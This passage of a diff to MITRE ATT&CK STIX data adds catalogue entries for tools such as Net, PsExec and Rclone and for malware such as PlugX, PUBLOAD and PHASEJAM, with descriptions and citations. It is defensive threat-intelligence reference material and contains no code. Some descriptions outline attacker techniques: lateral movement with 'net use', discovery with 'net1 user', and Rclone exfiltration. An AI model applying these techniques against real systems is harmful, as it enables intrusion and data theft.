+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.734000+00:00\", \"old_value\": \"2026-04-22 23:22:17.808000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:31.601000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Net",
+                    "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0039",
+                            "external_id": "S0039"
+                        },
+                        {
+                            "source_name": "Microsoft Net Utility",
+                            "description": "Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.",
+                            "url": "https://msdn.microsoft.com/en-us/library/aa939914"
+                        },
+                        {
+                            "source_name": "Savill 1999",
+                            "description": "Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.",
+                            "url": "https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Net",
+                        "net.exe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "David Ferguson, CyberSponse"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 14:16:53.721000+00:00\"}}}",
+                    "previous_version": "2.8"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-02-14 17:08:55.176000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Nltest",
+                    "description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0359",
+                            "external_id": "S0359"
+                        },
+                        {
+                            "source_name": "Nltest Manual",
+                            "description": "ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.",
+                            "url": "https://ss64.com/nt/nltest.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Nltest"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 13:17:52.139000+00:00\"}}}",
+                    "previous_version": "1.4"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--ca3f5123-b853-45ef-83cb-1d1bca22e03f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-16 13:59:06.123000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "PHASEJAM",
+                    "description": "[PHASEJAM](https://attack.mitre.org/software/S9014) is a dropper written as a bash shell script that modifies Ivanti Connect Secure appliance components. [PHASEJAM](https://attack.mitre.org/software/S9014) was first reported in January 2025. [PHASEJAM](https://attack.mitre.org/software/S9014) has previously been leveraged by People's Republic of China (PRC)- affiliated actors identified as UNC5221 and SYLVANITE.(Citation: Dragos SYLVANITE MuddyWater Electrum March 2026)(Citation: Google UNC5221 Ivanti January 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9014",
+                            "external_id": "S9014"
+                        },
+                        {
+                            "source_name": "Dragos SYLVANITE MuddyWater Electrum March 2026",
+                            "description": "Dragos. (2026, March 24). Dragos 2026 OT Cybersecurity Report: Year in Review, O&G and Petrochemicals Focus. Retrieved April 17, 2026.",
+                            "url": "https://hub.dragos.com/hubfs/2026_YIR_ExecutiveBriefing%20O_G.pdf?hsLang=en"
+                        },
+                        {
+                            "source_name": "Google UNC5221 Ivanti January 2025",
+                            "description": "John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson. (2025, January 8). Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation. Retrieved April 14, 2026.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "PHASEJAM"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 02:56:02.086000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--9491a623-5861-4d0a-9958-8c05d0d17442",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-19 19:03:14+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "PHPsert",
+                    "description": "[PHPsert](https://attack.mitre.org/software/S9028) is a webshell used to execute PHP code that has been in use since at least 2023 against targets in Japan, Singapore, Peru, Taiwan, Iran, Republic of Korea, and the Philippines. [PHPsert](https://attack.mitre.org/software/S9028) is not typically deployed as a standalone but integrated into web content such as text editors and content management systems.(Citation: sentinelone operationDigitalEye Dec 2024)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9028",
+                            "external_id": "S9028"
+                        },
+                        {
+                            "source_name": "sentinelone operationDigitalEye Dec 2024",
+                            "description": "Aleksandar Milenkoski, Luigi Martire. (2024, December 10). Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels. Retrieved February 27, 2025.",
+                            "url": "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "PHPsert"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 23:57:49.687000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--3824852d-1957-4712-9da0-38143723c060",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-08-04 16:35:44.800000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "PUBLOAD",
+                    "description": "[PUBLOAD](https://attack.mitre.org/software/S1228) is a stager malware that has been observed installing itself in existing directories such as `C:\\Users\\Public` or creating new directories to stage the malware and its components.(Citation: 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload)  [PUBLOAD](https://attack.mitre.org/software/S1228) malware collects details of the victim host, establishes persistence, encrypts victim details using RC4 and communicates victim details back to C2.  [PUBLOAD](https://attack.mitre.org/software/S1228) malware has previously been leveraged by China-affiliated actors identified as [Mustang Panda](https://attack.mitre.org/groups/G0129).   [PUBLOAD](https://attack.mitre.org/software/S1228) is also known as \u201cNoFive\u201d and some public reporting identifies the loader component as [CLAIMLOADER](https://attack.mitre.org/software/S1236).(Citation: 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1228",
+                            "external_id": "S1228"
+                        },
+                        {
+                            "source_name": "2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA",
+                            "description": "Golo Muhr, Joshua Chung. (2025, May 15). Hive0154 targeting US, Philippines, Pakistan and Taiwan in suspected espionage campaign. Retrieved August 4, 2025.",
+                            "url": "https://www.ibm.com/think/x-force/hive0154-targeting-us-philippines-pakistan-taiwan"
+                        },
+                        {
+                            "source_name": "2022 November_TrendMicro_Earth Preta_Toneshell_Pubload",
+                            "description": "Nick Dai, Vickie Su, Sunny Lu. (2022, November 18). Earth Preta Spear-Phishing Governments Worldwide. Retrieved August 4, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "PUBLOAD"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-08 13:51:05.286000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:01.483000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Ping",
+                    "description": "[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0097",
+                            "external_id": "S0097"
+                        },
+                        {
+                            "source_name": "TechNet Ping",
+                            "description": "Microsoft. (n.d.). Ping. Retrieved April 8, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/bb490968.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Ping"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 14:17:47.775000+00:00\"}}}",
+                    "previous_version": "1.5"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--64fa0de0-6240-41f4-8638-f4ca7ed528fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:15.638000+00:00",
+                    "modified": "2026-05-12 15:12:00.734000+00:00",
+                    "name": "PlugX",
+                    "description": "[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0013",
+                            "external_id": "S0013"
+                        },
+                        {
+                            "source_name": "DestroyRAT",
+                            "description": "(Citation: CIRCL PlugX March 2013)"
+                        },
+                        {
+                            "source_name": "Kaba",
+                            "description": "(Citation: FireEye Clandestine Fox Part 2)"
+                        },
+                        {
+                            "source_name": "PlugX",
+                            "description": "(Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013)"
+                        },
+                        {
+                            "source_name": "Korplug",
+                            "description": "(Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013)"
+                        },
+                        {
+                            "source_name": "Sogu",
+                            "description": "(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013)"
+                        },
+                        {
+                            "source_name": "Thoper",
+                            "description": "(Citation: Novetta-Axiom)"
+                        },
+                        {
+                            "source_name": "TVT",
+                            "description": "(Citation: Novetta-Axiom)"
+                        },
+                        {
+                            "source_name": "CIRCL PlugX March 2013",
+                            "description": "Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.",
+                            "url": "http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf"
+                        },
+                        {
+                            "source_name": "Dell TG-3390",
+                            "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.",
+                            "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage"
+                        },
+                        {
+                            "source_name": "New DragonOK",
+                            "description": "Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
+                        },
+                        {
+                            "source_name": "Novetta-Axiom",
+                            "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.",
+                            "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
+                        },
+                        {
+                            "source_name": "FireEye Clandestine Fox Part 2",
+                            "description": "Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html"
+                        },
+                        {
+                            "source_name": "Lastline PlugX Analysis",
+                            "description": "Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.",
+                            "url": "https://lastline3.rssing.com/chan-29044929/all_p1.html#c29044929a2"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "PlugX",
+                        "Thoper",
+                        "TVT",
+                        "DestroyRAT",
+                        "Sogu",
+                        "Kaba",
+                        "Korplug"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Kyaw Pyiyt Htet (@KyawPyiytHtet)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.734000+00:00\", \"old_value\": \"2025-11-20 22:48:45.121000+00:00\"}}}",
+                    "previous_version": "3.3"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:21.771000+00:00",
+                    "modified": "2026-05-12 15:12:00.741000+00:00",
+                    "name": "PsExec",
+                    "description": "[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0029",
+                            "external_id": "S0029"
+                        },
+                        {
+                            "source_name": "SANS PsExec",
+                            "description": "Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.",
+                            "url": "https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/"
+                        },
+                        {
+                            "source_name": "Russinovich Sysinternals",
+                            "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.",
+                            "url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "PsExec"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Janantha Marasinghe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.741000+00:00\", \"old_value\": \"2024-09-25 20:31:21.768000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--da04ac30-27da-4959-a67d-450ce47d9470",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.741000+00:00",
+                    "name": "QuasarRAT",
+                    "description": "[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0262",
+                            "external_id": "S0262"
+                        },
+                        {
+                            "source_name": "QuasarRAT",
+                            "description": "(Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) (Citation: TrendMicro Patchwork Dec 2017)"
+                        },
+                        {
+                            "source_name": "xRAT",
+                            "description": "(Citation: TrendMicro Patchwork Dec 2017)(Citation: Securelist APT10 March 2021)"
+                        },
+                        {
+                            "source_name": "Securelist APT10 March 2021",
+                            "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.",
+                            "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/"
+                        },
+                        {
+                            "source_name": "TrendMicro Patchwork Dec 2017",
+                            "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
+                            "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
+                        },
+                        {
+                            "source_name": "GitHub QuasarRAT",
+                            "description": "MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.",
+                            "url": "https://github.com/quasar/QuasarRAT"
+                        },
+                        {
+                            "source_name": "Volexity Patchwork June 2018",
+                            "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
+                            "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "QuasarRAT",
+                        "xRAT"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Kyaw Pyiyt Htet, @KyawPyiytHtet"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.741000+00:00\", \"old_value\": \"2026-04-17 19:56:22.409000+00:00\"}}}",
+                    "previous_version": "2.2"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--251f1715-fc97-4487-b939-5c8823ef7a39",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-17 19:03:01.696000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "ROAMINGHOUSE",
+                    "description": "[ROAMINGHOUSE](https://attack.mitre.org/software/S9026) is a dropper malware used by [MirrorFace](https://attack.mitre.org/groups/G1054) to extract and execute embedded payloads including [UPPERCUT](https://attack.mitre.org/software/S0275) components.(Citation: Trend Micro Earth Kasha Updates APR 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9026",
+                            "external_id": "S9026"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Kasha Updates APR 2025",
+                            "description": "Hiroaki, H. (2025, April 30). Earth Kasha Updates TTPs in Latest Campaign Targeting Taiwan and Japan. Retrieved April 17, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "ROAMINGHOUSE"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dominik Breitenbacher, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-22 20:58:39.745000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--59096109-a1dd-463b-87e7-a8d110fe3a79",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-08-30 13:02:36.422000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Rclone",
+                    "description": "[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1040",
+                            "external_id": "S1040"
+                        },
+                        {
+                            "source_name": "Detecting Rclone",
+                            "description": " Aaron Greetham. (2021, May 27). Detecting Rclone \u2013 An Effective Tool for Exfiltration. Retrieved August 30, 2022.",
+                            "url": "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/"
+                        },
+                        {
+                            "source_name": "DFIR Conti Bazar Nov 2021",
+                            "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.",
+                            "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/"
+                        },
+                        {
+                            "source_name": "Rclone Wars",
+                            "description": "Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.",
+                            "url": "https://redcanary.com/blog/rclone-mega-extortion/"
+                        },
+                        {
+                            "source_name": "Rclone",
+                            "description": "Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.",
+                            "url": "https://rclone.org"
+                        },
+                        {
+                            "source_name": "DarkSide Ransomware Gang",
+                            "description": "Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.",
+                            "url": "https://unit42.paloaltonetworks.com/darkside-ransomware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Rclone"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Ian McKay"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-20 13:39:30.460000+00:00\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--69d6f4a9-fcf0-4f51-bca7-597c51ad0bb8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:12.858000+00:00",
+                    "modified": "2026-05-12 15:12:00.735000+00:00",
+                    "name": "Remsec",
+                    "description": "[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
